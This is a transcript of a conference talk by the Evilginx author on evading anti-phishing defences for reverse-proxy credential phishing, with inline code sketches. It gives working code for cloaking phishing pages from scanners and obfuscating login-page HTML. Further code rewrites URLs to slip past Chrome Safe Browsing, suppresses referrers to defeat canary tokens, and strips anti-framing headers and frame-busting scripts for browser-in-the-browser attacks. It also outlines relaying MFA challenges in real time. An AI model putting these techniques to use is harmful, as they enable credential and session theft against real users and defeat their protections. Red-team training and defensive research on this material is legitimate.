Transcript for:
Phishing Evasion Techniques

[Music] Thank you. It's a pleasure to be here again this year. I've got the slot right before the pirate ship trip, so I'm honored to be invited. Today I want to tell you about the wise fisherman who never trusts the weather, which is to say: how you can bypass modern anti-phishing protections. Last year I talked about how to protect yourself and how to prevent bots from analyzing your phishing pages. Now I want to expand on the subject and cover all of the evasion methods I've found so far.

Quickly, about me: my name is Kuba Gretzky. I'm an offensive security tools developer and an ex-game hacker. I used to hack MMO games back in the day, and that's where I learned most of my skills. These days I don't do reverse engineering anymore; I focus mostly on phishing, because it's easier, obviously. I run the BREAKDEV security blog, where you can find my research and all the updates about my tools. I started Evilginx in 2017 and it has since become my full-time job, thanks to all of you wonderful people who support me and my other projects: BREAKDEV RED, the community for red teamers I started about two years ago, which everyone is free to join, and Evilginx Mastery, the video course I released two years ago to teach people how to use the tool I made too hard to use on its own. Thank you to everyone who supported those as well. And Evilginx Pro, which I've been talking about for a couple of years now, every time promising it would be released "next quarter", is finally out.

So what am I doing exactly? Right now I'm focused full-time on Evilginx Pro, trying to streamline the phishing side of red team engagements so that everything works fluently out of the box and you don't have to put in extra work to make it run. Like I said, the main goal is to offload excess tasks from red teams. Also, not many people know that Gdynia, the city we're in and the city I'm from, originated as a fishing village several hundred years ago. So in a way I'm preserving the original fishing tradition by running my own phishing business.

I run the BREAKDEV RED Discord community, which is also tied to the whole panel I built for Evilginx Pro sales. I wanted to set up my own licensing system, and for that I needed a custom shop engine, so I decided to build it all by myself from scratch. This is what the registration form looks like: every single one of you can apply, and every submission is verified manually. And this is the admin panel I had to write for myself to actually do the verification of each submission, which takes a lot of time.
Later I also added a panel where you can assign licenses to Evilginx Pro, with a whole cart system: adding items, generating invoices, and so on. This took six months, probably too long, because I wanted to focus on building a hacking tool and instead fell into the rabbit hole of writing a full shop engine. So far I've approved about 1,700 hackers into the community, and every single submission was verified by hand. And then I realized: I built a shop engine from scratch and then invited 1,700 hackers into it. What have I done? So far so good, though; nobody has actually managed to break it yet, so consider that a challenge for some of you.

First of all, what is this talk about? I want to talk about the state of reverse-proxy phishing detections. I'll be focusing on reverse-proxy phishing, not on the detection of the emails that carry the phishing links, because that's an entirely different subject. I want to focus on the detection of the phishing pages themselves; for example, later in the talk I'll cover how to bypass Google Chrome Safe Browsing.

I've divided the anti-phishing evasion tactics into three separate layers; I call them the three layers of deception. The first is stealth. When the TLS certificate for your phishing page gets registered, and maybe some of you don't know this although I've mentioned it many times, the certificate is uploaded to the public Certificate Transparency logs, where anyone can browse it and where bots and automation tools can grab and analyze the hostnames you use for your phishing sites. The goal at this layer is to prevent public exposure of your phishing hostname. The next layer is deception. At some point your phishing URL gets exposed, and it has to be, because you send it to your target and they need to click it to get phished. The goal here is to prevent automated scanners from being able to analyze what's on the page and mark it as malicious. The last layer, the last resort if all else fails, is obfuscation. When your phishing page does get inspected, we should prevent automated scanners from recognizing it as a phishing attempt and make it look as legitimate as possible, so that when someone opens the link they just see, say, a Wikipedia page where nothing suspicious is happening, except the domain doesn't match.

You can picture these as onion layers. The outer layer is when the hostname and URL are not known, and there we use wildcard certificates to protect the hostnames of our phishing pages. The middle layer is when the URL is known, and there we have BotGuard or Cloudflare Turnstile, for example, which analyze the browser's telemetry. The inner layer is when the page is actually accessible, and there we need to perform obfuscation. So let's start with the first layer, stealth. This is the simple stuff that some of you already know about: protecting the phishing hostname.
Every phishing hostname needs a TLS certificate, obviously, because plain HTTP is effectively not supported anymore; it's clear text and nobody wants it. It also looks much more legitimate when you have the lock icon in the web browser, which is really what this is about. Now, every registered TLS certificate is made public. You can go to crt.sh, check any domain you want, and you'll get the full history of all the TLS certificates issued for that domain, including all of its subdomains. Once the hostname is known to a bot or a security product, it can be resolved to an IP address, and the HTTPS server behind it can then be analyzed externally.

So what happens when you use non-wildcard TLS certificates for your phishing engagements? Here's a screenshot I made for my domain evilginx.com, which I use for all the product-related websites. You can see the full history: when each certificate was registered, when it expires, and the full hostname including every subdomain. This is also genuinely useful if you're doing pentesting; it's a great way to discover hidden subdomains of the site you're assessing. You can also see that in 2018 something fishy was happening on this domain: there are Facebook-related subdomains from the time when I used it to run Evilginx tests, and they still contaminate the whole history. Remember that one does not simply remove a TLS certificate from the internet. Once you do fishy stuff, it stays there forever, and I have to live with that too.

Then we have wildcard TLS certificates, and what's the difference? Essentially, if you use a wildcard certificate, the leftmost label of the hostname gets, you could say, obfuscated: the certificate hides the actual subdomain. If someone wanted to find the hostname of your phishing page, they would have to run some kind of dictionary attack and brute-force the subdomain, because it isn't publicly known. This of course only holds until your URL becomes known and gets burned, because you do have to send it to someone. They are also not able to connect to your HTTPS server by IP without knowing the hostname.
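To make the exposure concrete, here is a minimal sketch, under my own assumptions, of how a scanner or a curious analyst might enumerate a domain's certificate history straight from the Certificate Transparency logs using crt.sh's public JSON endpoint. The domain is a placeholder and the field names reflect crt.sh output at the time of writing:

```javascript
// Sketch: enumerate hostnames exposed through Certificate Transparency
// for a given domain, via crt.sh's public JSON endpoint.
// Runs on Node 18+ (global fetch). "example.com" is a placeholder.
async function ctHostnames(domain) {
  const url = `https://crt.sh/?q=%25.${domain}&output=json`; // %25 is a URL-encoded "%"
  const res = await fetch(url);
  const entries = await res.json();
  const hosts = new Set();
  for (const e of entries) {
    // name_value holds the newline-separated SAN entries of each certificate
    for (const name of (e.name_value || "").split("\n")) {
      hosts.add(name.trim().toLowerCase());
    }
  }
  return [...hosts].sort();
}

ctHostnames("example.com").then((hosts) => console.log(hosts));
```

Note that with a wildcard certificate the only SAN that ever shows up in a query like this is `*.example.com`; the actual phishing subdomain never appears, which is exactly the point of the advice above.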
The next layer is deception. The phishing URL will eventually get exposed, because you want it to reach the target, and security products will open that URL and try to scan the page to see what its contents are. So how can we prevent bots from seeing what's on the phishing page? Some of you are probably already familiar with Cloudflare Turnstile, which is designed to block bot traffic, and some people also use it to analyze the traffic coming to their phishing pages and filter it. In Evilginx Pro I implemented my own cheap knockoff of Cloudflare Turnstile, which I call BotGuard, and this is essentially how it works, step by step. Evilginx forwards the connection to a spoofed website that you configure, for example wikipedia.org. When your phishing link is opened, it fetches the content of that spoofed site and returns it to the visitor's browser together with the BotGuard script, which runs inside the page. The page itself is hidden with a CSS style set on the body. The script then gathers browser telemetry and sends it back to the Evilginx Pro server for analysis, and that's when Evilginx Pro makes the decision whether this is a bot or not. I talked about how that decision works last year at x33fcon, so you can look it up if you want the details. If a bot is detected, the CSS is flipped back to visible and the bot simply sees wikipedia.org with nothing suspicious going on (although it's probably better not to use wikipedia.org for your phishing pages; it's a bad example). If the visitor is judged not to be a bot, they get redirected to the phishing page for the target website, for example accounts.google.com, which comes back as the proxied login page. That's the gist of how BotGuard works, and it's similar to what Cloudflare Turnstile would do.

The takeaways here: the majority of bots still don't even have JavaScript enabled, so most detections happen by analyzing the contents of the page, and if wikipedia.org content is returned, nothing about it looks suspicious. Bots see the proxied content of a legitimate website, while human visitors get redirected to the phishing page; that's when the BotGuard rules are working as expected. I built BotGuard as a cheap knockoff of Cloudflare Turnstile, but apparently someone tested both Turnstile and BotGuard from Evilginx Pro, and Microsoft Defender for Endpoint did not detect the latter. So, points for me, I guess, for making a knockoff.
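To make the pattern concrete, here is a minimal client-side sketch of the gate described above. This is not BotGuard's actual code; the /telemetry endpoint, the fields collected, and the verdict format are all made up for illustration:

```javascript
// Sketch of the gating pattern described above (not the real BotGuard code).
// The decoy page starts hidden; telemetry is posted to a hypothetical
// /telemetry endpoint; the server answers with a verdict.
(async () => {
  document.body.style.visibility = "hidden";      // keep the decoy invisible for now

  const telemetry = {
    ua: navigator.userAgent,
    webdriver: navigator.webdriver === true,      // set by many automation drivers
    languages: navigator.languages,
    screen: { w: screen.width, h: screen.height },
    touchPoints: navigator.maxTouchPoints,
    tz: Intl.DateTimeFormat().resolvedOptions().timeZone,
  };

  try {
    const res = await fetch("/telemetry", {        // hypothetical analysis endpoint
      method: "POST",
      headers: { "Content-Type": "application/json" },
      body: JSON.stringify(telemetry),
    });
    const verdict = await res.json();              // e.g. { human: true, next: "/o?td=..." }
    if (verdict.human) {
      window.location.replace(verdict.next);       // real visitor: off to the proxied login page
      return;
    }
  } catch (_) {
    // on any failure, fall through and just show the decoy
  }
  document.body.style.visibility = "visible";      // bot (or error): reveal the decoy site
})();
```

In practice the real signal comes from many more data points and from how they correlate server-side, but the hide, collect, decide, reveal flow is the part that matters here.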
Then we get to the interesting part, which is obfuscation. This is the last layer, the last resort for protecting your phishing page from analysis. The detection tools that will scan your phishing page are, first of all, Google Chrome Safe Browsing, which is one of the major ones and the most serious when it comes to detecting and flagging your site as malicious. Then there are browser extensions, for example Push Security, and there are canary tokens, which work as a tripwire informing the website owner when their site has been used in a phishing attack. The things these security products scan are usually the HTML content, the JavaScript content, the request URLs, which are very important and we'll get to them in a bit, and finally the DOM structure: once the website is loaded, it gets analyzed on the client side as well.

First we have HTML obfuscation. Imagine this is part of the login screen of login.microsoftonline.com. What your phishing setup should do, and some people use Caddy or another intermediary that intercepts the connection to the phishing page for this, is full HTML obfuscation. What gets served instead is just a simple script tag with a document.write call that decodes a base64 string, applies several string replacements, and writes the result out as the page content. This effectively blocks any kind of signature or pattern detection by bots that look for strings identifying a Google, Microsoft, or whatever other login page they may be targeting.

Next we have JavaScript obfuscation, and for that you can use engines like obfuscator.io, which turn readable code into something unrecognizable. With Evilginx Pro this is dynamic: on every reload, I think every five minutes, it generates a new, randomly obfuscated output. This also helps when you want to use, for example, browser-in-the-browser JavaScript, which is heavily fingerprinted by Google Safe Browsing, inside your phishing pages and still have it work.
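As a toy illustration of that HTML step, and only an illustration, this is the kind of thing that can be served in place of the real markup. The payload here is just `<h1>Sign in</h1>` with an invented extra substitution, not anything Evilginx Pro actually emits:

```html
<!-- Toy example of the technique described above, not the real encoder.      -->
<!-- The blob is "<h1>Sign in</h1>" base64-encoded, with "aW4" swapped for     -->
<!-- "@@" so that a scanner grepping the raw response sees neither the markup  -->
<!-- nor even a clean base64 string.                                           -->
<script>
  var blob = "PGgxPlNpZ24g@@8L2gxPg==";   // mangled base64 of the real markup
  var b64  = blob.replace(/@@/g, "aW4");  // undo the substitution
  document.write(atob(b64));              // decode and emit the page content
</script>
```

A scanner that only pattern-matches the HTTP response body has nothing to match on; only a client that actually executes the script ever sees the login markup.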
Then we get to client-side phishing tool detection. Here we have signature detection of injected web content, cookie names that can be recognized, and in general detection slowly moving to the client side. This is interesting, because it looks like web browsers are becoming antiviruses in their own right these days. Scanning websites and phishing links from an external point of entry is not that viable anymore, so the detection systems are being installed inside the web browsers themselves, which open these sites anyway and can analyze the page while it's being rendered on screen for the user who is getting phished.

One of the people doing really great work here is Luke Jennings, a blue-team guy working as head of research at Push Security, so shout out to him. He works on the Push Security browser extension, which actually targets Evilginx by checking for several signatures, IOCs you could say, artifacts that indicate Evilginx is running within the browser. There's also a post by Rad Kabar, who is here at this conference, so shout out to him as well. I tried to convince him to give a talk about it, because he did some great research on the Push Security extension and figured out exactly how it looks for Evilginx dynamically while the page is being loaded. The open-source version of Evilginx uses a predictable pattern for cookie names: four characters, a dash, four characters, with a value that is always 64 hex characters. That's a pretty good indicator that something fishy is going on. Then there are the paths of the JavaScript files injected into the reverse-proxied website, which usually start with /s/ followed by another 64 hex characters, and that's enough of an indicator for the extension to mark the site as malicious. For the open-source version I'm not changing these signatures. The public version of Evilginx is meant more as a proof of concept, and you can change the source code yourself; it's pretty easy to customize on your own. It's also just as well, because the bad guys are using Evilginx extensively too, as we found out, what, two weeks ago? Well, maybe not just two weeks ago; more like since 2017.
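For a sense of how little is needed to flag those artifacts, here is a sketch of the kind of client-side IOC matching an extension could do. This is not Push Security's actual code; it just encodes the two stock-Evilginx patterns mentioned above as I understood them:

```javascript
// Sketch of client-side IOC matching for the stock Evilginx artifacts
// described above (not Push Security's actual extension code).
const COOKIE_RE = /(?:^|;\s*)[A-Za-z0-9]{4}-[A-Za-z0-9]{4}=[0-9a-f]{64}(?:;|$)/;
const SCRIPT_PATH_RE = /^\/s\/[0-9a-f]{64}$/;

function evilginxIndicators() {
  const findings = [];
  // 1) "xxxx-xxxx" cookie names whose value is exactly 64 hex characters
  if (COOKIE_RE.test(document.cookie)) {
    findings.push("suspicious cookie name/value pattern");
  }
  // 2) injected scripts served from /s/<64 hex characters>
  for (const s of document.querySelectorAll("script[src]")) {
    const path = new URL(s.src, location.href).pathname;
    if (SCRIPT_PATH_RE.test(path)) {
      findings.push(`suspicious injected script: ${s.src}`);
    }
  }
  return findings;
}

console.log(evilginxIndicators());
```

Which is also why customizing those defaults in your own build defeats this particular check.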
Now I want to get to the fun stuff. The next level of bypassing Chrome Safe Browsing is a kind of URL obfuscation. Imagine a URL that looks similar to the Google login URL you would normally use; I simplified it a bit, kept two GET parameters intact and removed the others, just to make it easier to read on screen. Here's what Google will do. It sees there's an accounts subdomain, then a URL path that Google Chrome also recognizes, and then it checks the GET parameters, their names and their values, against the ones it knows. By the way, I found this out through trial and error, so don't take my word for it; I did not reverse engineer Google Chrome to confirm this is really what it's doing, but through testing this is what I've managed to figure out so far. When it matches all of these, the subdomain, the URL path, and the GET parameters, it then checks the domain: it's google.com, OK, everything is fine. But what if it's actually a reverse-proxy phishing page, which preserves all the characteristics of the same URL? The accounts subdomain, the URL path, and the URL query will be identical, and when Google Chrome recognizes all of those parts and then tries to match the domain to google.com, that's when bad things happen and you see something like this, which you've probably seen many times before. How many of you have had a phishing campaign burned by this nice screen? OK, good to see.

The solution here is URL rewriting. I've been approached many times by people asking whether Evilginx could do these URL rewrites, and I was never able to get it working well, but now I think I've finally found out how to do it properly. There's a new section you can implement within the phishlet; right now it only works in the Pro version. It looks for the domain of the login page, and in this example I'll use login.microsoftonline.com, then it checks whether a request triggers a specific path, and what path to replace it with. In this example it replaces it with /o, and you need to supply at least one key that will be injected into the URL, containing the {id} placeholder in braces, because Evilginx also needs to maintain an index of all the mapped URLs it has used, so it knows what to redirect to when the user later hits one of these replaced URLs.

So in this example, let's say this is a phishing link for the Microsoft login page: the subdomain is login, the path is the same as the real one, and the GET parameters are the same too; again, this is a simplified view. The phishing hostname login.phishing.com maps to login.microsoftonline.com, so when Evilginx comes across this URL it knows where to redirect the request, and the link gets rewritten to login.phishing.com/o with our td key and a randomly picked ID that identifies this specific rewritten URL. When the user opens this in Google Chrome (which, by the way, also does pattern and signature detection of the Microsoft page; some people report it doesn't trigger most of the time, but that's also what I found), the browser matches the subdomain but does not match the URL path or the URL query. So everything is fine: it was not able to match these characteristics to the Microsoft login page in its database.

How does it work in transit, when the data is proxied through Evilginx? The browser makes the request to the real URL path on the hostname of the phishing domain that is proxying the Microsoft login screen. Evilginx responds with a 302 Found and a Location header, because it has already mapped this URL, and in this way the URL gets replaced in the browser itself, on the client side, so the client doesn't trigger detection. What I found is that detection doesn't happen when the browser makes the request towards the phishing page; it happens when the response comes back from the website, probably because the HTTP response headers are analyzed as well. Then, when the browser follows the redirect and requests the rewritten URL, Evilginx knows that this URL, with its randomly generated ID, maps to that login screen with all of its parameters intact.

It's also important to note that sometimes you cannot replace the full URL path. For example, it's not possible on Google. So there's an option to whitelist certain parameters of the GET request so that they are not replaced and remain intact, and the td parameter with the randomized ID is added alongside them. That's because Google heavily relies on its own JavaScript, with its own obfuscation engine, which grabs parameters directly from the URL in the address bar; some parts have to stay intact, and the accounts subdomain, for example, has to remain as well. The same thing happens in the other direction: when the phished website, the destination, tries to redirect the user to a URL we're rewriting, that Location redirect gets captured, intercepted, and replaced on the fly with our rewritten URL.
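To pin down the mechanics, here is a self-contained sketch of the mapping idea, under my own assumptions rather than Evilginx Pro's actual implementation: a request for a heavily signatured login path is answered with a redirect to a neutral path carrying a random ID, and the ID is resolved back to the original URL when the browser follows the redirect. The trigger path, the /o path, and the td parameter simply mirror the example above:

```javascript
// Sketch of the URL-rewriting idea described above (not the Evilginx Pro code).
const http = require("http");
const crypto = require("crypto");

const TRIGGER_PREFIX = "/common/oauth2/v2.0/authorize"; // illustrative signatured path
const urlMap = new Map();                               // random id -> original path + query

http.createServer((req, res) => {
  const url = new URL(req.url, "https://login.phishing.example"); // placeholder host

  if (url.pathname.startsWith(TRIGGER_PREFIX)) {
    // First request: remember the real URL, send the browser to /o?td=<id> instead,
    // so the recognizable path and query never linger in the address bar.
    const id = crypto.randomBytes(8).toString("hex");
    urlMap.set(id, url.pathname + url.search);
    res.writeHead(302, { Location: `/o?td=${id}` });
    res.end();
    return;
  }

  if (url.pathname === "/o" && urlMap.has(url.searchParams.get("td"))) {
    // Second request: the neutral URL maps back to the original login URL,
    // which a real proxy would now fetch from the destination site and relay.
    const original = urlMap.get(url.searchParams.get("td"));
    res.writeHead(200, { "Content-Type": "text/plain" });
    res.end(`would proxy the real login page for: ${original}\n`);
    return;
  }

  res.writeHead(404);
  res.end();
}).listen(8443);
```

The same map is what lets the proxy rewrite Location headers in the opposite direction, when the destination site redirects the user to a URL that needs to stay hidden.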
Next I wanted to talk about canary tokens. Canary tokens were developed by Thinkst Canary, and you can create them for free. Essentially they let you inject a URL that acts as a tripwire into the page you expect to be phished. For example, Microsoft Entra ID tenants allow you to supply your own custom CSS stylesheet and your own background image for the login screen of your tenant, and you can use the URL that Canarytokens provides you with for that. Whenever a visitor opens the page, even a legitimate one, a request is made for that background image, and the request carries a Referer header revealing the URL of the site the visitor is actually on. I'll dive deeper into how that works on the next slide. There are also JavaScript canary tokens; if one of those is present on the site you're trying to phish, you will have to replace it dynamically with some kind of signature detection as well. Here's an example for the website breakdev.org: if the domain does not match, it makes a request to an outside resource. But here I want to focus mostly on the CSS canary token, because it's harder to avoid. Well, it used to be. I want to give a shout out to Thinkst Canary for releasing this research and giving everyone a way to use canary tokens; they published a pretty nice blog post about it. Also a shout out to Kanis, who several months later released a very detailed post about how he went about bypassing these kinds of protections, and I'm going to dig a bit deeper into how this works.

It all relies on the referrer policy the web browser applies to the site you're currently browsing. The default value is strict-origin-when-cross-origin, and with it the browser will attach a Referer header to HTTP requests whenever a link to an external resource is present somewhere on the page. For example, if your CSS file points to a background image on a URL that is not on the same domain, as in this example where it was on cloudfront.net, which does not match the domain of the website you're browsing, then the request will include a Referer header that looks like this. If this were implemented on the phishing page, that request would carry a Referer pointing at our phishing page, exposing our phishing infrastructure.

So how do we prevent the browser from sending this Referer header? Since we are a reverse proxy and can modify every packet going back and forth between the destination server and the user, we can inject our own HTTP headers into the responses. If you inject Referrer-Policy: no-referrer into the response, the browser will not include any referrer information in any request, even requests to external resources. This has been done automatically in the open-source version of Evilginx ever since I read that article and decided to figure out how to bypass it. This is what the response looks like.
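A minimal sketch of that countermeasure, assuming a hypothetical helper in the proxy's response path rather than Evilginx's actual code:

```javascript
// Sketch: force a no-referrer policy on every proxied response so the victim's
// browser never attaches a Referer header when it fetches canary-token
// resources (background images, CSS, etc.) from third-party domains.
// Hypothetical helper, not taken from Evilginx.
function neutralizeCanaryReferrer(upstreamHeaders) {
  const headers = { ...upstreamHeaders };
  // Overwrite whatever the real site sent; "no-referrer" suppresses the
  // Referer header on subresource requests and navigations alike.
  headers["referrer-policy"] = "no-referrer";
  return headers;
}

// Headers as they might arrive from the proxied site...
const fromUpstream = {
  "content-type": "text/html; charset=utf-8",
  "referrer-policy": "strict-origin-when-cross-origin",
};
// ...and as they get relayed to the victim's browser.
console.log(neutralizeCanaryReferrer(fromUpstream));
```

The same effect can be had by injecting a `<meta name="referrer" content="no-referrer">` tag into the proxied HTML, which is a useful fallback if you would rather not touch the headers.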
Now, Chrome would still send the Referer header even when the referrer policy was set to no-referrer, and that's exactly what Kanis ran into in his blog post: he was wondering what was wrong, because the browser wasn't behaving as documented. As he put it, it turned out they had unintentionally identified a bug in Chromium browsers. They reported it to the Chromium team, but it got categorized as a low-severity issue, and he mentioned there was no telling whether or when it would be fixed, so we could either pray that our target isn't using a Chromium browser or go looking for a better solution. But fast forward to 2025 and it has been fixed; I checked before making this slide. So this Referer issue with regard to canary tokens is no longer a problem. You just need to set no-referrer in the response header, which happens automatically with Evilginx.

As a bonus, I wanted to mention browser-in-the-browser, a technique that got quite popular a few years ago. It isn't really a way to evade anti-phishing detections as such, but I think it's important to mention. It was released by mr.d0x in 2022, and here's how it works: it's a UI written in JavaScript that mimics a Windows or macOS window inside the website you're looking at, and in this fake window there's an iframe with your phishing page. Here you can see, well, you probably can't because it's too small, that since you control the rendering of this fake window, you can put your own URL bar in it saying login.microsoftonline.com, or a Google one; it doesn't contain your phishing hostname at all.

It all revolves around iframes and clickjacking, which is why browser-in-the-browser has problems these days. Back in the 2000s there was a pretty popular attack called clickjacking. You would render part of the website you wanted to target, say facebook.com with a Like button, put another website on top of it, and place some enticing image on that top layer, so that the person clicking the top layer would actually click the Like button underneath. That's how clickjacking worked: you could trick users into clicking buttons on websites they were logged into through this kind of sneak attack. Because of that, websites started implementing ways to refuse to run within iframes; framing wasn't really needed anyway, and iframes became a liability. There are now multiple ways to prevent a website from loading inside an iframe. For example, you can set HTTP response headers on your own web server, such as X-Frame-Options set to deny, or a Content-Security-Policy. So if you want to do browser-in-the-browser injection, your goal is to remove these headers from the responses.
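A sketch of that header-stripping step in the proxy's response path, with the usual caveat that this is an illustration of the idea rather than any tool's actual code:

```javascript
// Sketch: remove the anti-framing protections from a proxied response so the
// page can be loaded inside a BITB iframe. Hypothetical helper, not taken
// from any particular tool.
function stripAntiFramingHeaders(upstreamHeaders) {
  const headers = { ...upstreamHeaders };
  delete headers["x-frame-options"];          // e.g. "DENY" or "SAMEORIGIN"
  if (headers["content-security-policy"]) {
    // Drop only the frame-ancestors directive and keep the rest of the policy,
    // so the page still renders the way the real site expects it to.
    headers["content-security-policy"] = headers["content-security-policy"]
      .split(";")
      .map((d) => d.trim())
      .filter((d) => !d.toLowerCase().startsWith("frame-ancestors"))
      .join("; ");
  }
  return headers;
}

console.log(stripAntiFramingHeaders({
  "x-frame-options": "DENY",
  "content-security-policy": "default-src 'self'; frame-ancestors 'none'",
}));
```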
For JavaScript it's a bit more complicated. Detecting iframes in JavaScript is pretty straightforward and easy to implement, but it can be hard to spot when you're targeting a website and want to implement your browser-in-the-browser there. Here you can see the website checking whether the top window is different from itself, and if so, replacing the URL of the top window with its own. The iframe detects that it isn't the top window and redirects the top window to itself, essentially, which prevents any form of framing. Later a very clever man, Waelmas from Cyprus, gave a great talk about frameless browser-in-the-browser; I forgot to put the date on the slide, but I think it was about two years ago. What he did was not use iframes at all. Instead he took the rendered, proxied phishing page, for example the Microsoft sign-in screen, and modified its contents to include the fake dialog directly within its own HTML. That's pretty complicated, because his demo was for the Microsoft website and had to be made super custom to work. Making a universal solution is very complicated, because you need to prepare your own modifications for every single website you're targeting. It works the same way, looks the same way, and works great, but it's difficult to implement for sites that aren't single sign-in screens like login.microsoftonline.com. If the site needs to reload after a while, you lose the modifications made to the HTML content and it stops working.

But all is not lost: there are ways to overcome iframe blocking and make browser-in-the-browser work again. First, find the JavaScript anti-framing code, like the check for top window versus self window, and replace it in real time. This has to be customized for each website, and if the site has any other protections against reverse-proxy phishing, such as checking the domain name in the URL address bar, those need to be removed as well. It's just some additional work that has to be done. And recently, I think a bit more than a week ago, a fellow hacker, OtterHacker on Twitter, published his own phishlet for Evilginx that strips the protections of the Okta sign-in page, removing all of these iframe protections and making browser-in-the-browser work there again. Really, shout out to him; terrific work, and it proves this can be done on any website; it just needs a bit more work and a bit more analysis.
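The anti-framing check in question usually boils down to a few lines, and neutralizing it from the proxy side can be as crude as rewriting the comparison before the page reaches the victim. Here is a deliberately naive sketch, with a regex that is purely illustrative; as noted above, real targets need per-site analysis:

```javascript
// The classic frame-busting check in a page's own JS looks roughly like:
//
//   if (window.top !== window.self) {
//     window.top.location = window.self.location;   // break out of the iframe
//   }
//
// A reverse proxy that wants BITB to keep working can rewrite that code in the
// HTML/JS it relays. Deliberately naive, illustrative rewrite:
function neutralizeFrameBusting(body) {
  return body
    // turn "top !== self"-style comparisons into something that is always false
    .replace(/(?:window\.)?top\s*!==?\s*(?:window\.)?self/g, "false")
    .replace(/(?:window\.)?self\s*!==?\s*(?:window\.)?top/g, "false");
}

const sample = "if (top !== self) { top.location = self.location; }";
console.log(neutralizeFrameBusting(sample));
// -> "if (false) { top.location = self.location; }"
```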
So here is the summary, the too-long-didn't-listen version of how to protect your phishing campaign. First, use wildcard TLS certificates so you don't expose your phishing hostname. Then filter web traffic with JavaScript bot-detection tools like Cloudflare Turnstile, or write your own telemetry gathering and analysis. Then obfuscate the HTML and JavaScript to protect them from signature detection, and rewrite URL paths, which turns out to be very important on these login pages that are heavily signatured, especially in the Google Chrome browser. Or reverse-proxy only the multi-factor authentication flow. This is something I want to talk more about this year, once I've done some proper research, but it's essentially what cybercriminals are doing right now, for example when phishing for Steam accounts. They do it the old way: render a static HTML page with a login and password form, and there's no reverse proxying of web content at all, so none of the client-side detections implemented in the JavaScript that would otherwise get reverse-proxied from the destination website are ever in play. Once the login and password are entered into this fake login page, the phishing server, in the background, uses a background browser running over there to log in with the same credentials, grabs the MFA challenge, and shows it back to the user in real time on the static HTML page. When the user enters the MFA challenge, it gets entered into that background browser on the server as well. This is pretty much game over for most anti-phishing protections, and the last resort against it is really to use passkeys and FIDO2 solutions.

And Evilginx Pro is out; everything I talked about today is implemented in the Pro version, so consider this a very short ad. Thank you everyone for coming to the last talk of the day. Thank you. Any questions?